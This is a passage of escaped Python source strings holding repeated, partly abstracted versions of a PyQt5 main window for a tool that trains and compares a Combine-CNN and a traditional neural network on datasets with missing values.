QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n return\n\n def loadData(self):\n if self.sender() is self.dataFileChooseButton:\n try:\n self.dataFor['New'] = myLoadData.loadData(self.fname['New'],\n self.dataLossRate['New'], self.dataSetLossValue['New'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['New'].split('/')[-1].split('.')[0]\n self.presentDataName.setText(dataname)\n self.presentDataName.resize(self.presentDataName.sizeHint())\n elif self.sender() is self.dataFileChooseButtonT:\n try:\n self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],\n self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n self.presentDataNameT.setText(dataname)\n self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n return\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n <function token>\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n def showResult(self):\n if self.sender() is self.showResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'combine-CNN预测结果展示', self, 'New')\n elif self.sender() is self.showResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'traditional NN预测结果展示', self, 'Tra')\n return\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.windowLength = 1250\n self.windowHigh = 900\n self.fname = dict()\n self.fname['New'] = None\n self.fname['Tra'] = None\n self.dataLossRate = dict()\n self.dataSetLossValue = dict()\n self.dataFor = dict()\n self.dataFor['New'] = None\n self.dataLossRate['New'] = 0.0\n self.dataSetLossValue['New'] = 0.0\n self.dataFor['Tra'] = None\n self.dataLossRate['Tra'] = 0.0\n self.dataSetLossValue['Tra'] = 0.0\n self.traingWidgetOnFlag = dict()\n self.traingWidgetOnFlag['New'] = False\n self.traingWidgetOnFlag['Tra'] = False\n self.combineNumConv = 2\n self.convCoreNum = 5\n self.combineNumPooling = 4\n self.fullConnectOutInRate = 0.5\n self.mcbcnn = None\n self.trann = None\n self.trainingW = None\n self.trainingWT = None\n self.initUI()\n self.initConnect()\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n return\n\n def loadData(self):\n if self.sender() is self.dataFileChooseButton:\n try:\n self.dataFor['New'] = myLoadData.loadData(self.fname['New'],\n self.dataLossRate['New'], self.dataSetLossValue['New'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['New'].split('/')[-1].split('.')[0]\n self.presentDataName.setText(dataname)\n self.presentDataName.resize(self.presentDataName.sizeHint())\n elif self.sender() is self.dataFileChooseButtonT:\n try:\n self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],\n self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n self.presentDataNameT.setText(dataname)\n self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n return\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n <function token>\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n <function token>\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.windowLength = 1250\n self.windowHigh = 900\n self.fname = dict()\n self.fname['New'] = None\n self.fname['Tra'] = None\n self.dataLossRate = dict()\n self.dataSetLossValue = dict()\n self.dataFor = dict()\n self.dataFor['New'] = None\n self.dataLossRate['New'] = 0.0\n self.dataSetLossValue['New'] = 0.0\n self.dataFor['Tra'] = None\n self.dataLossRate['Tra'] = 0.0\n self.dataSetLossValue['Tra'] = 0.0\n self.traingWidgetOnFlag = dict()\n self.traingWidgetOnFlag['New'] = False\n self.traingWidgetOnFlag['Tra'] = False\n self.combineNumConv = 2\n self.convCoreNum = 5\n self.combineNumPooling = 4\n self.fullConnectOutInRate = 0.5\n self.mcbcnn = None\n self.trann = None\n self.trainingW = None\n self.trainingWT = None\n self.initUI()\n self.initConnect()\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n 